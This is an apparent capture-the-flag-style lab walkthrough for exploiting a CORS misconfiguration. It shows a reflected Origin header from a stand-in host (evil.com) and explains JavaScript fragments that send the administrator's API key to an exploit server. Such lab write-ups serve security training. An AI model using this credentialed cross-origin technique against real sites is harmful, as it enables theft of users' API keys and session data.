Lab Description
Log in to the application using the provided credentials: wiener:peter.
Navigate to the account details page. You will notice a response containing:
User information such as the username, email, and API key.
The response headers include:
Access-Control-Allow-Credentials: true: Indicates that the server allows requests with user credentials (e.g., cookies).
It implies that the server is designed to trust and process cross-origin requests that include authentication credentials. If the origin validation is flawed, this becomes a vector for attacks.
send the request of /accountDetails to the repeater.
Add the header Origin: https://evil.com to the request.
Observe the response:
The server reflects the Origin header back in the Access-Control-Allow-Origin response header.
This indicates a vulnerable CORS configuration where any origin is trusted.
Using the information gathered, the plan is to:
Exploit the insecure CORS configuration.
Use JavaScript to retrieve the administrator's API key from the account details endpoint.
Code Breakdown
var req = new XMLHttpRequest();
Creates a new object to send an HTTP request.
req.onload = function()
Defines a callback function to execute once the HTTP request is complete.
Appends the server's response (API key) to /log?key= and sends it to the exploit server.
req.open('get', 'URL', true);
Prepares a GET request to fetch the account details.
req.withCredentials = true;
Includes cookies and credentials in the request.
req.send();
Sends the crafted request.
Upload the crafted JavaScript payload to your exploit server.
Deliver the exploit to the victim (administrator) by sharing the link to the exploit server.
Monitor the exploit server logs.
Observe requests made by the victim, including their session details.
Decode the request to extract the administrator's API key.
Use the captured API key to complete the lab.
Verify the solution by submitting the key as prompted.
Last updated